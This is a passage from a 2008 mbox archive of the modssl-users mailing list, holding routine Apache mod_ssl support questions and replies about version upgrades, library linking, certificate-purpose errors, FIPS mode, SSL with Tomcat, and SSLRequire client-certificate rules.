thanks,
Sir june




      ____________________________________________________________________________________
You rock. That's why Blockbuster's offering you one month of Blockbuster Total Access, No Cost.  
http://tc.deals.yahoo.com/tc/blockbuster/text5.com
--0-2038167095-1207063907=:55197
Content-Type: text/html; charset=us-ascii


I have a Solaris box with Apache 2.2.3  and mod_ssl 2.2.3.   Our security consultant ran a vulnerability software and the report recommended to upgrade to mod_ssl 2.8.24      or higher.     Is this possible ?  as i only see releases  for  Apache 1.3.x   What are your recommendations?

thanks,
Sir june






      
You rock. That's why Blockbuster's offering you one month of Blockbuster Total Access, No Cost.
--0-2038167095-1207063907=:55197--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  1 17:36:16 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 982CD14DA3B; Tue,  1 Apr 2008 17:36:16 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [70.61.80.18])
	by master.modssl.org (Postfix) with ESMTP id 1ECFF14DA3A
	for ; Tue,  1 Apr 2008 17:36:15 +0200 (CEST)
Received: from blackhole.sysinfo.com (blackhole.sysinfo.com [70.61.80.19])
	by darkstar.sysinfo.com (8.13.7/8.12.11) with ESMTP id m31FZ3WL029052;
	Tue, 1 Apr 2008 11:35:03 -0400
Date: Tue, 1 Apr 2008 11:35:00 -0400 (EDT)
From: "R. DuFresne" 
To: Sir June 
cc: modssl-users@modssl.org
Subject: Re: mod_ssl 2.2.3
In-Reply-To: <440852.55197.qm@web65716.mail.ac4.yahoo.com>
Message-ID: 
References: <440852.55197.qm@web65716.mail.ac4.yahoo.com>
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



modssl is built into the 2.x.x apache versions.  your consultant must be 
asking you to upgrade full apache version.


the 1.3.x apache tree still has a separate modssl base to add and build 
off of.  This should not be a concern for you since you are running the 
newer apache tree.

Thanks,


Ron DuFresne

On Tue, 1 Apr 2008, Sir June wrote:

> I have a Solaris box with Apache 2.2.3  and mod_ssl 2.2.3.   Our security consultant ran a vulnerability software and the report recommended to upgrade to mod_ssl 2.8.24      or higher.     Is this possible ?  as i only see releases  for  Apache 1.3.x   What are your recommendations?
>
> thanks,
> Sir june
>
>
>
>
>      ____________________________________________________________________________________
> You rock. That's why Blockbuster's offering you one month of Blockbuster Total Access, No Cost.
> http://tc.deals.yahoo.com/tc/blockbuster/text5.com

- -- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         admin & senior security consultant:  sysinfo.com
                         http://sysinfo.com
Key fingerprint = 9401 4B13 B918 164C 647A  E838 B2DF AFCC 94B0 6629

...We waste time looking for the perfect lover
instead of creating the perfect love.

                 -Tom Robbins 
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFH8lYmst+vzJSwZikRAm6YAJ9e9NwNJu8sGjuFE3CcnljNI3kVxgCfXl4x
R0NJeZnoKQpRfqrff0Xir+o=
=sIQZ
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 14 09:38:40 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id BD54614DA28; Mon, 14 Apr 2008 09:38:40 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mclniron02-ext.bah.com (mclniron02-ext.bah.com [156.80.1.73])
	by master.modssl.org (Postfix) with ESMTP id 4CACB14D82E
	for ; Mon, 14 Apr 2008 09:38:38 +0200 (CEST)
x-SBRS: None
X-REMOTE-IP: 156.80.7.152
X-IronPort-AV: E=Sophos;i="4.25,654,1199682000"; 
   d="scan'208,217";a="278480918"
Received: from bahmail.bah.com (HELO mclnexbh02.resource.ds.bah.com) ([156.80.7.152])
  by mclniron02-int.bah.com with ESMTP; 14 Apr 2008 03:38:11 -0400
Received: from MCLNEXVS07.resource.ds.bah.com ([156.80.7.141]) by mclnexbh02.resource.ds.bah.com with Microsoft SMTPSVC(6.0.3790.1830);
	 Mon, 14 Apr 2008 03:38:10 -0400
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C89E02.7D09D63A"
Subject: Concurrent User Stats
Date: Mon, 14 Apr 2008 03:38:09 -0400
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Concurrent User Stats
Thread-Index: AcieAnxLHjzSS08ORJyGCwfOYndeeg==
From: "Hoda, Nadeem [USA]" 
To: 
X-OriginalArrivalTime: 14 Apr 2008 07:38:10.0742 (UTC) FILETIME=[7D2F1560:01C89E02]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Hoda, Nadeem [USA]" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C89E02.7D09D63A
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

=20
Does anyone have metrics (or reference to metrics) related to PKI-based
concurrent users on an enterprise system, preferably smart-card based?
=20
I know this is a very open question, but we are looking for "acceptable"
system load metrics on high-end enterprise systems.=20
=20
Thanks,=20
=20
Nadeem

------_=_NextPart_001_01C89E02.7D09D63A
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable







 


Does =
anyone have=20
metrics (or reference to metrics) related to PKI-based concurrent users =
on an=20
enterprise system, preferably smart-card based?


 


I know =
this is a=20
very open question, but we are looking for "acceptable" system load =
metrics on=20
high-end enterprise systems. 


 


Thanks,=20



 


Nadeem


------_=_NextPart_001_01C89E02.7D09D63A--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 14 19:16:01 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5697B14DA30; Mon, 14 Apr 2008 19:16:01 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from ins.chs.spawar.navy.mil (ins.chs.spawar.navy.mil [150.125.14.5])
	by master.modssl.org (Postfix) with ESMTP id 2468B14D82E
	for ; Mon, 14 Apr 2008 19:15:58 +0200 (CEST)
Received: from g168075.chs.spawar.navy.mil (g168075.chs.spawar.navy.mil [150.125.168.75])
	by ins.chs.spawar.navy.mil (8.13.1/8.13.1) with ESMTP id m3EHFYet002866
	for ; Mon, 14 Apr 2008 13:15:34 -0400
Message-ID: <480390BE.1030204@spawar.navy.mil>
Date: Mon, 14 Apr 2008 13:13:34 -0400
From: John Minson 
User-Agent: Thunderbird 2.0.0.12 (X11/20080226)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: libssl.so  <-> mod_ssl.so
Content-Type: multipart/mixed;
 boundary="------------000801040702000704060507"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John Minson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------000801040702000704060507
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

I have to re-create mod_ssl 2.8.1 for an old version of apache (1.3.19) 
and even though I have it/they compiled I'm confused about 2 things .

I have several servers with various kevels of apache and mod_ssl.

The mod_ssl lib seems to be called 'mod_ssl.so' in some cases and 
'libssl.so' in others . ?

The 'libssl.so' I just created is 272328 bytes in size where on another 
server its 1884650 bytes in size . Is this due to the way it was linked ?

I have not yet tested my newly compiled libssl .

--------------000801040702000704060507
Content-Type: text/x-vcard; charset=utf-8;
 name="minsonj.vcf"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
 filename="minsonj.vcf"

begin:vcard
tel;work:843-218-6521
version:2.1
end:vcard


--------------000801040702000704060507--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 14 19:28:06 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6A4FC14D86D; Mon, 14 Apr 2008 19:28:06 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from yw-out-2324.google.com (yw-out-2324.google.com [74.125.46.28])
	by master.modssl.org (Postfix) with ESMTP id 3AAB114D82E
	for ; Mon, 14 Apr 2008 19:28:04 +0200 (CEST)
Received: by yw-out-2324.google.com with SMTP id 2so644647ywt.61
        for ; Mon, 14 Apr 2008 10:27:20 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        bh=nU9ZKlT05HZYdSAPxp8donBrCOlfWB7lRSUv2yi0STQ=;
        b=LhFBUBKUfm3bnprhhJGrvwPSN89Us1r2d8ciDVqt27G7Y0mx+52rwUsUPJ7ihN8sf7SAs+HPP24r9ZoBw46EcRQ6fXaqgYVR+klrAlP3+ZFIg5uEctzKVYTFVy8Oub9BNFPvTI810rL8Mfkguy/Ppl6L0bWhbIg7IX+DfH+TZEo=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=hskDJ8Kus398bNz0Tgiep/YCBrwWyShP3VADoh9fL9isThhInmDwMQ68rQ6eG86cj/rtasUiP0wq/yMToqOYoOD2NDVMZpdXuaFhQjZM2W8EnRg7Lac+Y9agfWhRC07qIAyZTQUwTuVWBfttyI6TwIKXaePEe/st/GPq78X06us=
Received: by 10.142.216.9 with SMTP id o9mr1905773wfg.93.1208194040230;
        Mon, 14 Apr 2008 10:27:20 -0700 (PDT)
Received: by 10.142.100.8 with HTTP; Mon, 14 Apr 2008 10:27:20 -0700 (PDT)
Message-ID: <740f716a0804141027y6def3fbr33d78203f38185e8@mail.gmail.com>
Date: Mon, 14 Apr 2008 10:27:20 -0700
From: "Yvo van Doorn" 
To: modssl-users@modssl.org
Subject: Re: libssl.so <-> mod_ssl.so
In-Reply-To: <480390BE.1030204@spawar.navy.mil>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
References: <480390BE.1030204@spawar.navy.mil>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Yvo van Doorn" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, Apr 14, 2008 at 10:13 AM, John Minson  wrote:
> I have to re-create mod_ssl 2.8.1 for an old version of apache (1.3.19) and
> even though I have it/they compiled I'm confused about 2 things .
>
>  I have several servers with various kevels of apache and mod_ssl.
>
>  The mod_ssl lib seems to be called 'mod_ssl.so' in some cases and
> 'libssl.so' in others . ?
>
>  The 'libssl.so' I just created is 272328 bytes in size where on another
> server its 1884650 bytes in size . Is this due to the way it was linked ?
>
>  I have not yet tested my newly compiled libssl .
>

Sounds like the libssl.so file you create is dynamically linked
whereas the old version is statically linked. what does ldd show you
for both?

Btw I hope this apache server is internal unless you like getting your
server compromised. Look at all the changes (especially security wise)
that has been fixed since that version:
http://www.apache.org/dist/httpd/CHANGES_1.3
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 22 09:58:20 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 37F9A14DA24; Tue, 22 Apr 2008 09:58:20 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from wf-out-1314.google.com (wf-out-1314.google.com [209.85.200.173])
	by master.modssl.org (Postfix) with ESMTP id 3AF1F14D836
	for ; Tue, 22 Apr 2008 09:58:18 +0200 (CEST)
Received: by wf-out-1314.google.com with SMTP id 24so1792980wfg.1
        for ; Tue, 22 Apr 2008 00:57:52 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type;
        bh=vSWpyebppMJ/cCN8cuk1L6JxBIqXIAutu+bMCzwG+og=;
        b=jvS4knrsW+L94wZ9nI1Z1bA4lnirClacoCtSgHoZBMKIhifo9I9Uy5mce7WCO71Y3hvxFrEeIpaVYg0fgheq9o/tlzMh2DYWsBSESUSv9Ap80CRkQU0vffjfVmgMmAV31Daj8MaAZ0n+uYXtQAi5EWl5dMc8vOytRuh4FiQhaZ4=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:to:subject:mime-version:content-type;
        b=Oy4WQIdOkQolBo9oaf6HrAfja8Ae7q3sjgNw5Kb4hSqinFta+pyy1riD8HGuY1283M770CTI1czeLoc3EX7I245WRwH2m58w0XVvi4vmW2l0SSQ6Olr56nYUsGStwmQl6UG8T03MBynw9FGee5Y8wvRgKqUrZZUf85icFLag+NQ=
Received: by 10.142.212.19 with SMTP id k19mr1365932wfg.86.1208851072890;
        Tue, 22 Apr 2008 00:57:52 -0700 (PDT)
Received: by 10.142.107.5 with HTTP; Tue, 22 Apr 2008 00:57:52 -0700 (PDT)
Message-ID: 
Date: Tue, 22 Apr 2008 09:57:52 +0200
From: "luc neulens" 
To: modssl-users@modssl.org
Subject: Unsupported_certificate_purpose
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_8028_11432015.1208851072901"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "luc neulens" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_8028_11432015.1208851072901
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Hi,



For a project at our company we have a test setup where a (Java) TestClient
(soapui) connects over HTTPS (mutual authentication) to a Apache WebServer
with modssl loaded. During the test phase we used a self signed certificate
(generated with Java keytool). No problem here.

For the production phase we generated a Keypair and sent out a CSR (using
the Java keytool) to a CA. After having received the certificates from the
CA we imported them in the Java keystore under the same alias as the one we
generated the CSR with.

But when connecting to the Apache WebServer we receive an error:

1) Apache logs mentions this: "unsupported_certificate_purpose"
2) Java application mentions this: SSLHandshakeException:
"unsupported_certificate"


Any help on this matter would be greatly appreciated.




Kind regards,



Luc Neulens

------=_Part_8028_11432015.1208851072901
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Hi,



For a project at our company we have a test setup where a (Java) TestClient (soapui) connects over HTTPS (mutual authentication) to a Apache WebServer with modssl loaded. During the test phase we used a self signed certificate (generated with Java keytool). No problem here. 


For the production phase we generated a Keypair and sent out a CSR (using the Java keytool) to a CA. After having received the certificates from the CA we imported them in the Java keystore under the same alias as the one we generated the CSR with. 


But when connecting to the Apache WebServer we receive an error: 

1) Apache logs mentions this: "unsupported_certificate_purpose"
2) Java application mentions this: SSLHandshakeException: "unsupported_certificate" 



Any help on this matter would be greatly appreciated.




Kind regards,



Luc Neulens







------=_Part_8028_11432015.1208851072901--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 23 19:39:39 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 901CC14D9DB; Wed, 23 Apr 2008 19:39:39 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from n63.bullet.mail.sp1.yahoo.com (n63.bullet.mail.sp1.yahoo.com [98.136.44.33])
	by master.modssl.org (Postfix) with SMTP id 5FBDF14D85B
	for ; Wed, 23 Apr 2008 19:39:37 +0200 (CEST)
Received: from [216.252.122.216] by n63.bullet.mail.sp1.yahoo.com with NNFMP; 23 Apr 2008 17:39:13 -0000
Received: from [69.147.65.156] by t1.bullet.sp1.yahoo.com with NNFMP; 23 Apr 2008 17:39:13 -0000
Received: from [127.0.0.1] by omp404.mail.sp1.yahoo.com with NNFMP; 23 Apr 2008 17:39:13 -0000
X-Yahoo-Newman-Property: ymail-3
X-Yahoo-Newman-Id: 257991.32074.bm@omp404.mail.sp1.yahoo.com
Received: (qmail 63550 invoked by uid 60001); 23 Apr 2008 17:39:13 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Message-ID;
  b=ZqqXzs0MER3wbM6sNqGbo29t9+3BQ98TTvKFT4INNLbcI1+dGNBTD402XCdi9NGJiIAr3oDNuA4kzWFzoG/NZSChMRBU3JqYP0JJrGL4NZOZXQ8NVDSq4/yIqTOtZ/qqWPuGyMljKqFJAIv7IIrEIyCkqiZx8jSeFHoUBk6POIc=;
X-YMail-OSG: Hh17Sk4VM1kf0S7MdUBYda9uEuQrONPI1xfYROF4jkb.SWyKlYTLUv1NJDfMPYdNTbFkK0nNGfm5q_WuZYFSbyQNGktWlWMUcw--
Received: from [129.6.84.222] by web46209.mail.sp1.yahoo.com via HTTP; Wed, 23 Apr 2008 10:39:12 PDT
X-Mailer: YahooMailRC/902.40 YahooMailWebService/0.7.185
Date: Wed, 23 Apr 2008 10:39:12 -0700 (PDT)
From: Ed Tred 
Subject: Can MOD_SSL be configured to only use ONLY FIPS 140-2 complaint openssl ???
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-1927914866-1208972352=:61488"
Message-ID: <41818.61488.qm@web46209.mail.sp1.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ed Tred 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0-1927914866-1208972352=:61488
Content-Type: text/plain; charset=us-ascii

Hello,

Can MOD_SSL be configured to only use the FIPS 140-2 complaint openssl ???

Ed





      ____________________________________________________________________________________
Be a better friend, newshound, and 
know-it-all with Yahoo! Mobile.  Try it now.  http://mobile.yahoo.com/;_ylt=Ahu06i62sR8HDtDypao8Wcj9tAcJ
--0-1927914866-1208972352=:61488
Content-Type: text/html; charset=us-ascii


Hello,

Can MOD_SSL be configured to only use the FIPS 140-2 complaint openssl ???

Ed







      
Be a better friend, newshound, and 
know-it-all with Yahoo! Mobile.  Try it now.
--0-1927914866-1208972352=:61488--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 30 16:33:26 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C437714DA33; Wed, 30 Apr 2008 16:33:24 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from hu-out-0506.google.com (hu-out-0506.google.com [72.14.214.226])
	by master.modssl.org (Postfix) with ESMTP id 61A0D14D836
	for ; Wed, 30 Apr 2008 16:33:23 +0200 (CEST)
Received: by hu-out-0506.google.com with SMTP id 34so822135hue.16
        for ; Wed, 30 Apr 2008 07:32:59 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type;
        bh=TCdSXS2vMv8fWJ+7oSBl2uT8B1Zw4TIBg/tkXYDv9Vo=;
        b=BxOJ23wf1GV0FnaJ9MZCZVMivx4Xn0uZUMKRLyWxXWpgwFQj8vEQb6pyCcC5oBsLoq+vy3a1MtN0tZAY4kOpNAXWICeDsYSBaJDNCrPgwLKJMtAA96WuPFSCY4TpVMBLcW4HQzk62/r8oINaTEDrZGEgVi7avCEYpJKU9EQHGow=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:to:subject:mime-version:content-type;
        b=i2o9MQKP7LgniqFkn9MhXSzoEKvSQ6Zj0RdCR73qvFFeKtzqGOITd32Kjj9t2KUoF94G2EohxLoZRm0LgeUgX9MejwsLcrg1bcgNkqd7WDf76BIk+b0w80IrzmTUMHSRUTW/S06kUj4OK4/Rbc9JAmf4jPWTpQeHzNUMfyZBAzQ=
Received: by 10.78.195.10 with SMTP id s10mr401684huf.15.1209565978675;
        Wed, 30 Apr 2008 07:32:58 -0700 (PDT)
Received: by 10.78.142.20 with HTTP; Wed, 30 Apr 2008 07:32:58 -0700 (PDT)
Message-ID: <592f71460804300732w8950716k6d8b4460d9defa8e@mail.gmail.com>
Date: Wed, 30 Apr 2008 11:32:58 -0300
From: "Rodrigo Correa de Paiva" 
To: modssl-users@modssl.org
Subject: Apache + tomcat + ssl
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_1964_15966531.1209565978666"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rodrigo Correa de Paiva" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_1964_15966531.1209565978666
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

hi all,
i have a apache 2.0.63 doing load balancer betwen 2 tomcat 6.x, each tomcat
are running 3 applications, now i need 2 of this applications running with
ssl, and the other one without ssl.
I already try some things but none of than works.
Someone have a idea?
TY

------=_Part_1964_15966531.1209565978666
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

hi all, 
i have a apache 2.0.63 doing load balancer betwen 2 tomcat
6.x, each tomcat are running 3 applications, now i need 2 of this
applications running with ssl, and the other one without ssl.

I already try some things but none of than works.

Someone have a idea?

TY

------=_Part_1964_15966531.1209565978666--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  6 17:03:25 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D756114D9EE; Tue,  6 May 2008 17:03:24 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from web23208.mail.ird.yahoo.com (web23208.mail.ird.yahoo.com [217.146.189.63])
	by master.modssl.org (Postfix) with SMTP id 1F60014D85B
	for ; Tue,  6 May 2008 17:03:21 +0200 (CEST)
Received: (qmail 50779 invoked by uid 60001); 6 May 2008 15:02:56 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.fr;
  h=X-YMail-OSG:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID;
  b=gbL80Ra/dzkfKhaZAZVEfxNwEZmHbOU9eVY6waX2CVp84vm/eM+b1su+d3OolNv4YXOwqyZun0F5dVVYdL8i78tK3eEr0/PgucvnR0ux+IWD+iFvgDTKqR5eYaeNIe/mMUsRXrdABK5pR0y2xv/uA8e3Pz9o20IkQaYd/RBEtnA=;
X-YMail-OSG: 9Yl54sMVM1nnGQr9Y3t6OSzlgdNdlDTp8V0r_mDqWmE4oFgLi_33HS2PcX0nQy6SYCLRmx1Jn_XC34N6VjWR4.zFelgkpNIefbkC6KxC5uSeqetuihhNyw49yF4-
Received: from [76.88.138.47] by web23208.mail.ird.yahoo.com via HTTP; Tue, 06 May 2008 17:02:55 CEST
Date: Tue, 6 May 2008 17:02:55 +0200 (CEST)
From: =?iso-8859-1?q?Fr=E9d=E9rique=20Da=20Luene?= 
Subject: SSLRequire, client certs and dynamic IP addresses
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Message-ID: <211243.50444.qm@web23208.mail.ird.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?q?Fr=E9d=E9rique=20Da=20Luene?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

We are trying to set up mod_ssl to get some "proper"
access to two classes of users. 

First, everybody must use client certs (signed by our
CA). Client cert control is okay and works properly
(SSLVerifyClient require, SSLVerifyDepth 1 and such).

Now, we have two classes of client certs, based on the
OU. Say, OU="Class 1" and OU="Class 2". We want to
allow :
- all users with "Class 1" certificates, and
- users with "Class 2" certs ONLY when they are
browsing from some IP addresses.

Those IP addresses are not known in advance, and may
be dynamic. Let's say we have an external list
(updated by some mean, irrelevant to our problem). How
can we check this list and correlate it with the OU
from the client cert ? We thought that something like

SSLRequire %{SSL_CLIENT_S_DN_OU} eq "Class 1"
  or ( %{SSL_CLIENT_S_DN_OU} eq "Class 2"
       and %{REMOTE_ADDR} in { file("/tmp/list") } )

(where /tmp/list is a list of allowed IP addresses)
would be the way to go, but this utterly fails.
Mod_ssl properly opens the file (strace shows that),
but even when the browser is coming from an IP in the
list, no access is granted.

Is this a problem coming from the file's content
(syntax ?), or are we wrong in our thinking ? And
then, what would be the way to go ?

Tia,
-- FdL

__________________________________________________
Do You Yahoo!?
En finir avec le spam? Yahoo! Mail vous offre la meilleure protection possible contre les messages non sollicités 
http://mail.yahoo.fr Yahoo! Mail 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  6 22:02:31 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C8DE114D9D9; Tue,  6 May 2008 22:02:31 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from frfcqmg011ix3r8.montpellier.mebs.ihost.com (mail2.aspaway.fr [129.35.163.230])
	by master.modssl.org (Postfix) with ESMTP id E459114D85B
	for ; Tue,  6 May 2008 22:02:30 +0200 (CEST)
Received: from frfcqws071ix328.infra.montpellier.mebs.ihost.com (frfcqws071ix328 [10.0.77.8])
	by frfcqmg011ix3r8.montpellier.mebs.ihost.com (8.12.11.20060308/8.12.11) with ESMTP id m46K21Ih003254
	for ; Tue, 6 May 2008 22:02:02 +0200
Subject: Jean-Pierre Guilloteau est absent.
From: jpguilloteau@aspaway.fr
To: modssl-users@modssl.org
Message-ID: 
Date: Tue, 6 May 2008 22:02:02 +0200
X-MIMETrack: Serialize by Router on MES01ASP/SRV/ASPAWAY(Release 7.0.2|September 26, 2006) at
 05/06/2008 10:02:04 PM
MIME-Version: 1.0
Content-type: text/plain; charset=ISO-8859-1
Content-transfer-encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jpguilloteau@aspaway.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I will be out of the office starting Thu 01/05/08 and will not return u=
ntil
Tue 13/05/08.

Je r=E9pondrai =E0 votre message d=E8s mon retour.
Vous pouvez en mon absence contacter Aspaway au 01 46 67 88 88 ou notre=

Hotline au 01 46 67 88 98.
Cordialement.=


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  7 17:22:33 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C19FC14DA30; Wed,  7 May 2008 17:22:33 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id 2421114D836
	for ; Wed,  7 May 2008 17:22:32 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.13.8/8.13.8) with ESMTP id m47FM6aF010538;
	Wed, 7 May 2008 11:22:06 -0400
